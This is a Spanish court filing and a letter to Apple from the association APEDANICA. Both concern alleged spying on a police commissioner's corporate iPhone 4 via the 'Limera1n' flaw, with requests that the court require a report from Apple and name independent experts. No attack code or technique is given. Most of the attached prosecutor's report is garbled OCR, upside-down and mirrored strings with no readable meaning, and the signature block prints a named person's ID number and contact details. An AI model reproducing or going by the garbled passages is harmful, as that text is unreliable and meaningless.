Al Juzgado de Instrucción 2 de Madrid , Dil.Prev. 4676/14 Pieza II por el fax 902998379 con copia para Juzgado de Instrucción 11 Dil.Prev. 3034/2013 y también para Fiscalía Especial contra Criminalidad Informática (Elvira Tejada de la Fuente) y Abogacía del Estado documento con firma digital publicado en www.cita.es/juzgadoiphone.pdf Hemos tenido acceso al informe de EL FISCAL Alfonso San Román de fecha 8.6.16 que entendemos que no está sometido a ningún secreto sumarial y con la máxima publicidad al alcance de la Asociación APEDANICA hemos trasladado a la empresa APPLE nuestras inquietudes y preocupación porque lo ocurrido en el iPhone corporativo utilizado por Marcelino MartínBlas mientras era Comisario de Asuntos Internos y conversaba con funcionarios del Centro Nacional de Inteligencia CNI, pueda ocurrir ahora mismo, o haya ocurrido en el pasado en más casos, en cualquier otro teléfono móvil. APEDANICA lleva tiempo investigando el espionaje de teléfonos móviles SMARTPHONES y en el especial caso de esta Pieza II de las Dil.Prev. 4676/14 del Juzgado de Instrucción 2 de Madrid tenemos entendido que el Centro Criptológico Nacional CCN del CNI subcontrató a una empresa privada para que un perito particular explicase lo ocurrido en el iPhone corporativo utilizado por Marcelino MartínBlas, sin resultado relevante alguno. No podemos comprender cómo existiendo numerosas plazas de funcionarios públicos tanto en la universidad pública como en el Consejo Superior de Investigaciones Científicas CSIC de supuestos expertos en seguridad informática, telefonía móvil y criptoanálisis forense, no se ha requerido ya el informe de tantos funcionarios públicos como sea necesario, y por otra parte, tampoco comprendemos cómo no consta ya en las actuaciones un informe de la empresa APPLE con toda la información de que dispone, o puede conseguir actualmente sobre la vulnerabilidad de los Apple iPhone 4 conocida como “Limera1n” y también sobre cómo reconstruir todo lo ocurrido que pueda ser presuntamente delictivo . Por una parte, este juzgado y el juez instructor Arturo Zamarriego Fernández conoce y tiene documentadas las actividades particulares de funcionarios públicos como peritos privados durante años de empresas como BOLIDEN y entidades privadas como la Sociedad General de Autores y Editores SGAE, así como la utilización de recursos públicos para proteger, incluso de la más correcta crítica, tales negocios privados de funcionarios públicos. No es decente ni admisible que ante la gravedad de los hechos de los que informa Alfonso San Román ni un solo catedrático o profesor titular de universidad, ni tampoco profesor de investigación o investigador titular del CSIC haya emitido ninguna opinión sobre lo ocurrido en el iPhone corporativo utilizado por Marcelino MartínBlas, al mismo tiempo que el CNI y el CCN financian, o informan favorablemente para que se financien proyectos tecnológicos en los que funcionarios públicos pueden enriquecerse sin límite ni control eficaz alguno. Por otra parte, basta con buscar APPLE en el Boletín Oficial del Estado BOE para hacerse una idea de lo que las Administraciones Públicas han pagado para que muy diversos cargos y funcionarios públicos, incluyendo senadores y diputados nacionales o autonómicos, utilicen teléfonos APPLE iPhone susceptibles de ser espiados como Alfonso San Román dice por escrito que lo ha sido, repetimos, nada menos que el iPhone corporativo utilizado por Marcelino MartínBlas mientras era Comisario de Asuntos Internos y conversaba con funcionarios del Centro Nacional de Inteligencia CNI, lo que nos parece muy alarmante.
En resumen, considerando lo informado por EL FISCAL Alfonso San Román con fecha 8.6.16, y considerando que se trata de un teléfono corporativo, parece ser que suministrado a la Administración General del Estado por una de las multinacionales más solventes del mundo, instamos al juzgado a que, a la mayor brevedad, REQUIERA: 1º Informe completo y detallado a la representación legal de APPLE en España
APPLE MARKETING IBERIA SA DENOMINACIÓN SOCIAL
CIF
FECHA CONSTITUCIÓN
APPLE MARKETING IBERIA SA
A58022724
01/07/1985
OBJETO SOCIAL / ACTIVIDAD
CNAE 4618 Intermediarios del comercio especializados en la venta de otros productos específicos
CAPITAL SOCIAL
REGISTRO
Madrid
DOMICILIO
CRA DE SAN JERONIMO 1 (MADRID).
TELÉFONO
FAX
913542900
916613810
PÁGINA WEB
EMAIL
REDES SOCIALES
www.apple.com/es
informacion@euro.apple.com
ÓRGANO ADMINISTRACIÓN
PRESIDENTE
AUDITOR
Consejo de administración
Ortiz Finnemore Luis Jonathan
ERNST & YOUNG SL
2º Que el juzgado nombre peritos con absoluta garantía de independencia a tres funcionarios con reconocida competencia en seguridad informática y criptología, así como en telefonía móvil y cuanto se evidencia como necesario para conocer, al menos, para garantizar que el espionaje de iPhones similares o incluso más antiguos que el corporativo utilizado por Marcelino MartínBlas mientras era Comisario de Asuntos Internos y conversaba con funcionarios del Centro Nacional de Inteligencia CNI no puede volver a ocurrir. La asociación APEDANICA considera inadmisible que no exista un responsable en la Administración que pueda garantizar que la telefonía móvil corporativa utilizada por cargos y funcionarios públicos es segura. Es altamente sospechoso e indicio de corrupción que habiendo contratado APPLE con la Administración el suministro de gran número de teléfonos iPhone no haya funcionarios capaces de coordinar una acción más eficaz contra el espionaje en la telefonía móvil corporativa de miembros del Cuerpo Nacional de Policía. APEDANICA combate activamente, y con publicidad sin contemplaciones ni complejos, toda IGNORANCIA DELIBERADA y los conflictos de intereses que posibilitan corrupción , cobardía e incompetencia en la Administración. Señalamos con sus nombres y apellidos especialmente a todos los cargos y funcionarios públicos responsables de delitos, abusos y negligencias en informática y comunicaciones avanzadas. Hacemos pública, nuestra crítica opinión sobre el enjuiciamiento del espionaje en España. El Juzgado de Instrucción 45 conoce bien nuestros esfuerzos y nosotros su perezosa lentitud pusilánime en relación al espionaje masivo de redes WiFi reconocido por Google estando pendiente la apelación que mantenemos en www.cita.es/apelagoogle y podemos ofrecer más referencias contra el espionaje en juzgados www.cita.es/apelachrome y www.cita.es/querellaflexispy entre otras muchas más referenciables en Internet). Sabemos que muchos particulares están completamente indefensos ante sus propios proveedores de Internet y/o telefonía y que multinacionales como APPLE, Google, Nokia y Microsoft toleran productos como FLEXISPY Spy Phone Mobile Spy MSPY cuya función “espiológica” ilegal es, aparentemente, la misma que detectada en e l iPhone corporativo utilizado por el comisario Marcelino MartínBlas. Tenemos la fundada sospecha de que la vulnerabilidad “Limera1n” ha sido mucho más utilizada de lo que se ha detectado, y también que existen productos ilegales específicamente diseñados para ello. Instamos al Juzgado a que lo investigue a fondo . APEDANICA reitera también aquí todo lo ya manifestado en este Juzgado en la querella pendiente de admisión en www.cita.es/querellaai ampliada en www.cita.es/ampliandoai y reiterada en www.cita.es/reiteraai de la que no tenemos noticia judicial alguna. Por lo expuesto, al Juzgado se solicita que tenga por hechas estas manifestaciones y peticiones de APEDANICA requiriendo a APPLE y nombrando a peritos funcionarios públicos con garantías de independencia y solvencia tecnológica específica, en Madrid, enviado por fax y correo electrónico al Juzgado con fecha de la firma digital en este documento publicado en Internet www.cita.es/juzgadoiphone.pdf digitalmente por ENTIDAD ASOC ENTIDAD ASOC PARA LA Firmado PARA LA PREVENCION ESTUDIO DELITOS Se adjunta documento también en ABUSOS NEGLIGENCIAS EN INFORMATICA PREVENCION ESTUDIO www.cita.es/espionajeiphone.pdf - CIF G80593254 - NOMBRE GALLARDO DELITOS ABUSOS ORTIZ MIGUEL ANGEL - NIF 07212602D que incluye informe de EL FISCAL Nombre de reconocimiento (DN): c=ES, NEGLIGENCIAS EN al que hacemos aquí referencia. o=FNMT, ou=FNMT Clase 2 CA,
INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D
ou=703015345, cn=ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Fecha: 2016.06.26 20:14:54 +02'00'
Para APPLE MARKETING IBERIA SA y APPLE RETAIL SPAIN SL
Luis Jonathan Ortiz Finnemore en APPLE
Atn. La Asociación APEDANICA, con datos oficiales en www.cita.es/apedanica.pdf desde hace tiempo investiga el espionaje de teléfonos móviles SMARTPHONES. Muy recientemente hemos tenido conocimiento de que una vulnerabilidad de los Apple iPhone 4 conocida como “Limera1n” fue utilizada para realizar una grabación presuntamente ilegal a quien fue comisario de Asuntos Internos. Según parece, se han realizado algunos estudios e informes sobre esa vulnerabilidad por parte del Centro Criptológico Nacional CCN del Centro Nacional de Inteligencia CNI según describe el informe del fiscal Alfonso San Román que se adjunta, en el que se comprende la gravedad de lo ocurrido sin más comentarios nuestros. Por otra parte, APEDANICA también investiga el mercado de aplicaciones intrusivas y el
espionaje de teléfonos móviles smartphones mediante programas troyanos como FLEXISPY sobre el que la asociación APEDANICA tiene el máximo interés en alertar porque puede espiar de manera prácticamente indetectable cualquier móvil de última generación. No es el único producto, pero sí uno de los más conocidos comercialmente, sin que aún exista jurisprudencia alguna que le cite. FLEXISPY es funcionalmente equivalente a Spy Phone Mobile Spy MSPY y otros programas que consideramos extremadamente peligrosos y presuntamente delictivos. APEDANICA ya ha iniciado un procedimiento ante la Federal Communications Comission FCC como puede verse en inglés en www.cita.es/fcccomplaint
Lamentablemente, los recursos de APEDANICA son muy modestos por lo que buscamos patrocinadores interesados en las investigaciones que hemos iniciado para que los responsables de las intrusiones, y especialmente quienes comercializan sistemas que no pueden tener fin lícito alguno, indemnicen a los perjudicados. En nuestra opinión, la venta sin control de productos como F LEXISPY Spy Phone Mobile Spy MSPY y otros similares debe ser controlada como si fuera armamento o instrumentos para fabricar monedas o billetes falsos. En caso de que se judicialice algún caso de espionaje en el que se haya empleado alguna de esas aplicaciones, el fabricante, importador, vendedor e instalador debe estar a la inmediata disposición del juzgado, en nuestra opinión, pero cuando ni siquiera se identifica, la inseguridad de los usuarios de smartphones no solamente es tecnológica sino también jurídica. APEDANICA trabaja para que no sea así.
Por todo ello, considerando la documentación adjunta, y las referencias que ofrecemos en www.cita.es/flexispyfiscal.pdf y www.cita.es/querellaflexispy quisiéramos poder tratar con un interlocutor que conozca la vulnerabilidad “Limera1n” lo antes posible, por teléfono o en una pronta reunión en Madrid.
Dr. (PhD) Miguel Gallardo , Tel. 902998352 Fax: 902998379 apedanica.org@gmail.com Asociación APEDANICA C/ Fernando Poo 166ºB E28045 Madrid, SPAIN (ESPAÑA) Documento publicado en www.cita.es/espionajeiphone.pdf adjuntando informe de fiscal
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf sa oTjop Un ap UOT3fl.SOAUT 1J iTrn as anb ¡TaTpnÍ sflo ap u9TYetJ.saAuT ap oi.Tqur a p1oqsap '(t'6t'T j) «sarnin6au a ap strna sauo nrn sns 'ua ¡miownstIi D.iniaqoa svwj aop'uvp ¡viaod OtWSiWO) asa y Ia6ao.1c[ ap s.JaLq oaiwi OLWSiWO ¡a fi ìa ivac[ UJ'Unfpv
sva
¡a ÙO3
'zaij orailJflhln
aia
ùoaaf
iniaan.ioa min asxa,, anb 'ojdrna[a od 'ouioa v ua (L6t'T Tsando.Td SauoTcyuuTJ uamq as anb 61T j) uinbouraap saUoTSn[3UO3 xasounoap A -auuojui ap Sj ap oprnauo JajD apEd IoAEm j ouxoo 'soqoaij sox.o ap u9133np0.qUT E'J UOT3EOTUflUTOO ap SOIpaUT SO[ uo u9TsnJrp ap aJqni.3o ap o
sj
iouasod ns A sajEToijod sElouapuadap ua
j7TO
aiva piqajaa P ja dND jap SOTIUOI3UnJ A IND jap saua sandns un ap u9oonpo1d u9TUnai un ua ET3JT u9T3EqEJ îaipnÍ Ezaid sa ap ol.aíqo Ej ap U9ToET1saAUT j (
ii
:uos SaUOT3EO3E SES3
IasJ aauojrn auasaid p SEJ e
'zaij ìsa
A
asip
spTuaqo Ejja ua EqanJd ap sauanj qap anb
uazus anb sauoTaj.00E sa.q uaaq as A
sej uip
opurp A OEUTJTJ
3UE3jE ja oTAaid
-'-'!T°P
iapio Uo3
oed
L17T ii Un1U ajap iopadsuj ousituoo ja iod u9TD3nisuJ ap opEznp r 'opEioqEja sa oi.uasa Ta 9TO ap oAEîn ap o
jpnp
ET43J ap qoaj ap ouosa ua (Ndr3) TEUOPEN EPTOd ap u9TsTno3 j .Tod EpE1.uasaid sauoIaEnaE ap EsandoJd-amJoJrn ja aqos ¿reuuojui ap uTJ ETauopTAoicT
iod opuajuoo
op 0AEUI ap o Eqoaj ap E '9TO opETsE.q ja OUEfl3EAO "ivosIi 'ia
http://www.cita.es/flexispy-fiscal.pdf www.cita.es/querella-flexispy www.cita.es/flexispy-juzgado y en inglés www.cita.es/fcc-complaint recomienda los siguientes enlaces relevantes para comprender el espionaje de teléfonos móviles smartphones:
jj EzaTd
17T /9L9t oiaurnu sETAald sEIouoTjTQ oiaurnu U9TO3fl.qSUJ ap opznp
pupjj ap
Dr. (PhD) Miguel Ángel Gallardo Ortiz, ingeniero, criminólogo, lic. y doctor en Filosofía, perito judicial privado, en mi propio nombre y derecho y también como presidente de la Asociación para la Prevención y Estudio de Delito Abusos y Negligencias en Informática y Comunicaciones Avanzadas (APEDANICA) en www.cita.es/apedanica.pdf Tel. 902998352 Fax: 902998379 E-mail: apedanica.ong@gmail.com para valorar e interpretar este documento que EL FISCAL Alfonso San Román dirige al
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ouioo u9ioBqBJ
unsoid
ns
T
op u9ioonpoJd
sond
uo ouBAo[aI uQTaTsod
i
SOpBtSOAUT
uo
ouì
soqooq
un uo aquon3uo os
so oj u9i3Bdr3tpd SOT
T°TV
B
OEJ.UBflO
srpoiod os
ZUNVNIJ NIN
"D
SO'INVD
0q5J BUJUJOD A ZOIOd OÍOJBITTA TOflUBIAT
OSOp
'ZopLTBUJoj JoTJ,J SOTI3 :sBuoslod SB.T.SO op soi'. op uorouoop sOil.o oauoa op SB.UOfl3 SB[ op ouodoid os T 01x103 SOPBU0ZYUTTB o sopnoq 'sopiqpol 'SOpBTAU0 sosuom 1030UO3 BIBd OOTUO.q.3oTo 001103 Op OL3TAIOS op so1opB.so1d
so.p
uquij4
SOT
B
SOEJ.U0TWBpUBUJ
soAtJJsodstp so..qo
'O3TUOIPOJ0
OuoTmBUo3BUITB
Op
'SoAt.TsodsTp op u9T3uoiuo1uT
A SOUOJJOJ. OUIO
'sBsolthuo op sopos A SOiTT3rLuOp op soisioi A sBpatuo souoi.sisuo3 srn3u0TIip saio ouxoo TSB sBuoslod j op 1x0
sOpBrl.SoAUT 01x103 UOizY1BT30p BJ MdF3 BI
iod ouodoid
o
0UOUJBB30B oS1B.uoTnn3op Bpond OUJIOJUT [Op OPTUO1.UO3 TO onb op A ououxBwTxo1d 10110 01.S0 1BUBSflS os onb op BsTuIoJd BI 0 oliBd osouodxo l3pond TB3S!J 110 SBPBITB1.OP OULIOJUT 0SO 1x0 onb oj opoj4 ouuoJuT oTdojd SBpB3tpBld SBI3U0TTTP SBT SBPOT B1.Tpol3B onb TBU0Wfl30P BI A
o.unÍ 'opBpodB q
'Bsond01d-ouuOJuI
011
NdFC)
'T
(
opBTnTxoidB
1BflT Ufl
1x0 'SBUO1.LIB SBUBA 1x03
UOT3BJflLTBLq op OSB3 110
'0
BU0UB BUfl op Blnl.10q03 op OTpBI JO iod BpOTqfl3 BUOZ BUfl UO UBUOfl3U0 os onb sBuoslod SBPBUTUIIO1.OP OpUOTOip O 0U0T3B nb 1BUTwJ00p BJBd ILL SB3TU9JoJo S0110T3B3UflU103
urnso
SBJ U0 UOI0TAflTUBUT OS
elBd
10 JUOJUT
SOPBIOTBA lOS
Ofib SOLTOT3BSIOAUO3 SBT op 0PTUO1.UO3 10d U05 onb Of 011103
JOIBA U0U0
uoqop
OU 'SOJOS IS
'U9T3BT1.SOAUT BI 1x0
S0BB301
'SO3TU9JO[O1
soAqlsodslp op U9T3BZT[B30[00 op SOB SOT 011103 TSB B3TUOJOI01. Sol.uoTpuodSono3 SBPBUIBTT op SBSTJ SBJ (
B0U!T BUfl B
SVIS3'TDI ZIJATOD SV'TODIN O3SflNVk1 iod SOtOUT03 PBP0SIBJ A SOUOT3UflJ op UOIDBdJflSfl 'BJBS0
ouourunsod op
SOTTTOP
Bj op
soi.sondns uBtJsoAuT os onb BI U0 'ZT.L)BUT BSflB3 ¡0 1x0 501.01305 op U013B10A01 A 01.uoTwUqfl3Sop op
03it.0
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf 'so oso- ouoiqur opluos i opdo s nb u9T3s..TAuoo os 'J8I -'i'vi s ousauoo rp ouojjoj. [ zopuu..ToJ uqLJ J uoT33rnnmo3 Ts ¡op ouojojai. JO 0PZTTOJ -'°IIN osm a'so u oinsn ns qiaiod j çpTU onb zTjtn uomiod 01 onb urs oi.ouioi uo ouoJoo. ¡op souorounj TJTqq onb suTLjp souoT3BoTJd op
sj
uoiasui
onb ppTJTqwouJnA ouoqdj ouojo ¡op
s
oriesruioo ¡o iod opzqtì.n
ppTJTqaTouJnA ìj 9q3oAoJd og :ouoints opow J SJ-uiJAJ
onj opoJdmo O3Tm10JUT í°
ioquTsuoo ru aioidns
01
onb uts
OZTLj OS
t
'S OIeSTUJO3 u0TSTuiStrJ1. T
(t'
i j) stg-tnrnjij ouvsiwoo ¡ap ornpiodoo Oùof?la t vzipaì iapr sorn anb vpvwt i aprnipaw vpvzqtaI j qw6 ifl,, :mJTJ os ¡eo u9ToqJ opis' rnj ¡t6a L19 u9TsnJOuoO oppojoi opepde ¡o uo 'jtoijod OULt0JT E°P opuna u 'opuatqoJoo q;so as puajoi u9ufl3J 'A 9TTsxo onpoid os 'i000d P'T1 sa onb qan.Tdwoa pUJJ op ooTjq ¡oQ zopuu10 os 50uOJ?JOT soqui OTIlO S14 5TH uJJAI .T5 0TISTUI0Z) °JAT -'S ¡op ouojojoi. ¡0 ¡op ouojojoj. ¡o opsop ptjnusuq onj uoTunai so uo pruoi.uw sondoid-ouuojui ¡o uno op oTid un uOi3siOAu0O
xs
r
ZOTJ
JJ
SO
Í5Op
05
onb j op 'pi1pJA Op 0U uoîoonqsuj op OpZflÇ ¡0 171 /9L917 touìsns os onb oi.uoursiooid so ¡eiotpnl dcIE SJ Io sno wj souoTounj op uoTodJnsn A OS[J 'Jso op SOTIJOP soTsondns iod sì'rsojj zomoo sTo3TN o3srouaxj opT1.soAuT pinos ¡raipnh sno j op 'soio o.quo ¡o aquoo soJT3TJod surouopuodop uo dM3 ¡op souuoiounj A 1MO ¡op op oiqnoo op o p
'iq
rd
souo
o.quo uçnuna
un oqnq
jç
soTund soTuoTnTs soj uo omnso..i os 3UUOJU ObrA MdPD Oj
t
T
uçiciqi ¡o
ej arqos
JouoTum
onb o op uotunsoi
tc
op ursnjip ¡ToTuT j opTuouoo ns A uoToqar ns 'uorunoi j op sornoqs nb ¿r1ij osiaoid A °m u9iq SO op ioianu oqooq so onb 01 iod ¡euTuxuo uoroqsour uprunoi j op iop u9Toq1 wj rnoiur u9snjip fl5 uo so
Io
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf u9rqur SOT
oms opoTpuT A omqxo o oiqos ogs ou souuoT3unj .iopod atd opotpid ixaroqnq s su 3nb OTUTUAUO3 OpTS e1qH U93SOAU e
-i;urìid
souoijoop oqo
soqun
OpAOJJ
sno
50j SOtJSO Ej E
utj onb sj3TJod op odni
io
sojijs
'-'°pi.q souuoiounj
sopiouo
SOqooq SOT 1T1.SOAUT op SO LI SOUISIIU SO UOS oprieflo OtU1XJA jE3pflf Bsn SOj 9p S9UO3EULIOJU
U9933E
oqq
un
3
SOS
opui
°d
ULflJ os u9pGoo.Id ¡G sG ou SEj 9nb j iod 50[3jOd SOULIOJUT so uo onbiod osondns iod p os oqooq o.so uo OAflTIiW os onb U9T3SJOAUO3 onb i000.oed OOflrj 9TUO TS SOTIUOT3UflJ UOO OIOUIO3 uOT3qi j op U9T3dU3STIafl. iuno.icT .iopod JOPO3OiT3SO opis pq TTO!U sop soso os ou souoi iepop i T
'ousqo
uonotaid
oìund ouio
LT
UJflU OTIUOT3UflJ IT °N T°M TO iod pSoio.ui OflJ j) saj..oed STIA iod SPT3TTOS UOlOflJ TOP r T (9i SOp3TJt.UOpT 5O3TIOd SiOTTOd sop soso OD SOU0T3BIeT3OP LIq OU Sfl3 OUfltITU OIJ3O SOTiUOiOUflJ SO SOT O U111U oJop ¿toi.00dsuj ° 'TT0N SOnd t'T T T T °P S0]tIOSOld UO1OIA1TJSO UOTUflOJ i
SJ
1°
T9-TITiIAI
'
eSO
..IS
uo onb uoiquI
3J.SeT3
'T
OPSmO3
TO
sopeprAae
soui000uo
SflS 5L3O13OS 011103
sond oUomBOToT SOUT030UOOSOp pepq.Uopi 3&fl3 SOP oi.uouiunsoid op SOUO
I
'rn3UOTT01LTT Op SOTOTAJO5
uoioipnoe
OP
17TO
eA U9TUflOI e
SOJ
OqrnO
P
e onb osieuotououi oqop
p
o oTAolcT
I°P
iopieo
PPnTe 1103 (T
so.UoTniS 50D
535[
SOUOTOeZtm
UO5
(SOUOTOefll3e
PPft°1 uo ouxoo) pepTTqisod owoa opTuo.
os
(esondo.id
o
OULTOJUT l°P SOUOTSnJDUOC)
5EJ op
5T op 03fl0 ¿ros
epond 019s
opnos oJaTid
9
OP O3fl0 os se) eZOpOD ouioo OSJODOqeSO opond U9TSnTOUOO IS U913eoiJttSflÍ u9toeqeJ et iouoi.qo eied opeo1duio OOUI SB[ op UOUO MdPO ¿rod uouodoid os onb SouOicyertpe oiied ue.wj Te3flOd ouuojuT oiqos SOUOTDeZtI.eU1 op ouos eun uoqop onb eJ0pTSUOD 'eZOTd SO 110 5OPeT1.5OAUT 50T
OSJO3eq
OIU0 op .TeoIonu
sopcfl.
ei opeqei epqeq os
A TeI3!U OqOOq
A
lP 051eei.
'T3SM
T
T01
.epTqToOJ u9TDesioAUoo '-soTeTolTod seTouopuodop 110 eiuonecu
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf puoTouom j ouxoo seuiTjEp souoro3.rid o[qTsod so ou oA1ocTo moSis j IB.TOUJUA op U9T3ZTq.fl opuoioid onb Tp u9loTsodsLp ipso ou iíiçui ouoJ?1Io i° is (t6 j) ssn ¡o iioo .iopntiapio ¡t owpa-uoo v.rncí 'la9w oLIof?al i 'ornsoc[sp ¡D ¡1JJodlL1at osaxrn,, JOLT01. oqop OS OUOLTdJ ouojoj. 'so oiso 'topi TOP t JJodxo T° euispn J O3T1dXo oiiiod T° ouuojui Tp 'ç° uqT °P (T6J) s1n aqrx 'un apirnpaw .iopv'uop.Io 7D 7a9w ornsodsp aioijai os) ppiTqaioujflA ¡a rn.pouoo aqap as,, (ui iouurj J o.uoqur uuij os OuuoJui i u i ¿ro'dxo arad onb OUTOO StL1TUp SOuOT33iTd optuos o uoTTuuod anb S sui op uoio j oueipom oioaioi un iod opjoiuoa ouuojui io uo uoquosop ios opond oi.uotuiuoiounj n 17
id
ida
os onb sol.uoTuxip030ld
soso onb uinj op O3iUo T Oo[31u UO3 17
0g
SOT OPUZTIT1fl 17
STST[LT,,
oUOqjJ o
OI
0L104d1 SOT SOCfl.
so'[qaIouTnA uos OTO
souojo
ppqouJni
uo
°
OU
¡Op
t'Y 0T0P0W
'id iauo iono uo
uooq
:SouoT3uuTJ SO1UOTflTS S13[ S'epJOXJ.UOO OpTS uJoTqnq
un iod iod
OS SOULIOJUT SO]
sT9-urnJN
's
U
-
OJO3.IO.
OUSTUTO3 io
opzqn ¡A9m ouoJIo1. TOP souoiounj sj onb uo O1UO1,STSUO3
ppTTqTsod
und
un
u9pqat
og
9ZT[O1
I
OS
T°
ZOiJO3 uoo i000jqso uouuod ro iod oatmJojui opom i aqo 3[Jfl.uoi3 ou soTT3uod souuojuT so;s j A (N33) Tu0M OOtOIo1.dTJ3 OiUO3 ¡o iod stouod StIA opoaid A 3tUUOJUT U931fldu3W op opiuouoo uq os 5965OOOL5TO JJ,\[J t' ouoqjj ì
sondns ns
s OUI3SILUOO
'
¡o iod opeziqn oAq'elodloo ouojp ¡o aiqog ouojoo lop uoisosod uo .nso ous000u so .Touoqo 'eicT spz n oi.uomunsoid 'suitJp o.ujop sm SOUTOJOA OtUOO (
'j op sondsop A sou'
u9ToqJ
isui
'u9Toqi souoT3oTTd
S
rd
opipoJ onj ouojjo ouounTAaId uoTnI sond 'uoiunai ' ns TS oiqos A u9lunol u OUOJTO1. TO OAOTI TS oiqos Sfl3 j uo oisondop aroiqnq sT9-ufl.JIAI is T° onb ouoTuoAuoo opTs uqq 'ojdmolo .Tod sopoup sotso uos SouuoT3unJ oiqos A sondoid-omiojui jo uo uoonpoquT os onb SOSO onb sopipoons soqooq sorj,o oiqos
osuo
50T
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf
p od ouotup000id ¡ op000 ou onb oonu oqaoq çns..iaa un op 'zo aqo os stT j) «trog/6o/o la S 197 op UOlOD7l9.lSWOJ O 1J91C)1L)Zl7DflpD m1n l ow.ioJu i DwJlJùo anb owoxo
'aq
7P-°
J1P
ool597oJc1L1j
'sapiaip'uodsauoo saiopzqinrn sv rnzipai .rnd j7 ¡Q ap aiqwarjc[as uo sv'ig NLLIVI/[ ouaawj,j otrnslwoo ap ornimocLioa oùofoa ¡o otnnbai rnnoj i op ¡ruauao tiçnooawj tfl,, onb ooîp sondoid-ouuojuî Top u9TsnJauOo tusim U os NdF3
ouoo
i op
sESTA uoo ouoqoid 'oLToot{ un ITpOJ3 onb rns oiod oiuo ppTiqTsod ouioo
pu
OSeJOJA 'o.uaj.
iod oqo
suTip souoTooTJd opjsrn uiq
ai os onb 'so oso 'op;omoidwoa opso q ouoiu2rnuopunJ Tauou ns onb uonbipui onb soqsi uponb ou jçui
oTuLiojui qon.TcT unurn uo uos os ou OU0JTO1. jo u u9Tsnjouoo e'i 'opnso p ooqo ouoJIo T°P sTsqu pp so itpthuoo os onb opuoj.oid os is 'uoisnjauoo
po
opjnsoi
jo
r°i
sig-ii;rnpij ouvsiuloo ¡op ornruothoa oponci ou ic apivipaw 19p19z17198J OOf?la ¡D DZ7DI so.rnj onb vprnrn Opis Dq ¡196071 u9ic)vqDJ5 vi,, onb uuij 'sondoid ouuoju ns op oioj r 'NdP3 wj souoisnjauoo
si u
'souoani.o
si op
17t
9Tpoons
ouowjo..I onb 01 uoa opuodsauoa os 'jna souioaouoasop 'sjjo op un oj9 ojqTsoci so souoiodo sop sij op atoTnbjen3 5TH -utj.ij,sj i jo iod opzTjq.n 'o.o.iouoo oAtTsodsTp jo uo (t :osioqop opond os
olos
o spnoq uoionj ounu onb spzijoi suip (
uojsuT
onb
souoiaaiodo sT op soaquuoJui soqsi 'osij
o sojnprsoi souoTamioJuT uoponb ou onb op oqooq jo so Jod (ol.JonA 6J) SDpDzflDa1 SOÙO100D SD7 ap ap 7vflpiSa! u9a19w.4ofLn op'Lrnpanb o'u 'svprnw3J6wc[ ?J9rflJaJO 197 OtID1pOW OWOO Dfl1312IOÙ1 13 UL1 of Op 0J1J13J 'SÌYJOCLII9O SO(ULjID d13WW17O 12Wd .18U190731 OWOO Sa1O3D3L7dD JD7DSLU
imo.oi
saw
O
opipoci vq 0JD3D9 i0 'oof?7o ¡a opiawwc1woa opls aqiq op 0S190 ¡3 'LAO,, A sD'LflWp SdIOlalXfl/dD SDDLI1WDX0 S0IO1OO13.JP(O S197
'Ud
ODLIO3'U0
ÙDt
OS
0j,, :oAnjouoo os sj-uJwJ,\J
oii'siuioo jo iod op'zTjtn 965OOOL5TO 1011/\[I 17 ouoijj op orpnìso fou ouopio ¡op opruouoa top souotoaatxo
sj
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf STO3M ogonbod T
P opTUoj.UO3
j,,
°-'n IND A T3UO1.STXO
:soTn3re so uo T
opugno o]qisuog LT9TouuoJuJ oTpoul
P3OUO3 o
uo
TO
OU
zopuuioj
APO1.
JoJAJ
S
LTIOS 'QyÇ[ iod sopoqqnd soTnoie SOJ 'opuno 'NdP3 A SO.UO.STS SOT OUoTmTO0UO3 UUO1. 0T9S u9ToarqoJoo ns op wj sondoid-oauojui T° uios uTqux PmTT WJ UT3OUO3 OS OU T
T°
OJ3OS alo uoiunoi A 'UOTUflOI BT OLIInp
suosiod siqur
fl-I
'TT3TTOd
°-'°
uoJuT
T°
s-utpw
UIS
'opLrno zopuuioJ
ig ousTUJoD Top SOUOJJO1. °HAI 1S oprouo T° A PmTT Ufl Op T3UO1SXO SOT 0J1.UO ugToaTnp op SOflUTW T °P 'OJOuTTId SOp UOS 'sosoqoodsos 'soqooq SOS3 U93qaI op ion oqisod ouxoo UOTUOS oj s onb soqooq so.q.o ou onb oTJTuTs ou zopuuJo{ ..ToTJA 50T13 ouTujuouT onb ot.uuuoJuT uqond uAuq OU onb op oqooq T° 'oiuquio u T
T
(uT3qo
T
OD JaTOUO
u9133011Q uT) °-'-'w-' T°P uioinu uT uiuisu os (soii.sui uuponb ou sond) opupoiou ou (suuujup souoiauoqdu op uioujsui op uauo pppqsod) ooTTodTq oqooq un oiqo U9TSflTDUOD so.qsui uuponb ou onbiod OuOJTO1. T° UO oiuL'ATum op u93TJSu (uoiuo ouois.rsu u[ o.iqos uZol.1o3 somouoi. ou 'suop op pupTs030u uís SOUOJTO1. op souunsn op uuoAuiii onb u913ulodo) oAtj.TsodsTp T°P u9TouzTTufll.ou ui uiud IuPLTOd opos uo OUOJTo1. T° uivaquo ST9-UuJAT s ouusTuoo o onb op uzoioo souxouol. ou 'opuoTuodxo OuOTA os OTflO3 'prpo1ou uo sisol.9dTq uun so onb osnoop oqop 'suurgup T
SOTO
onosqu
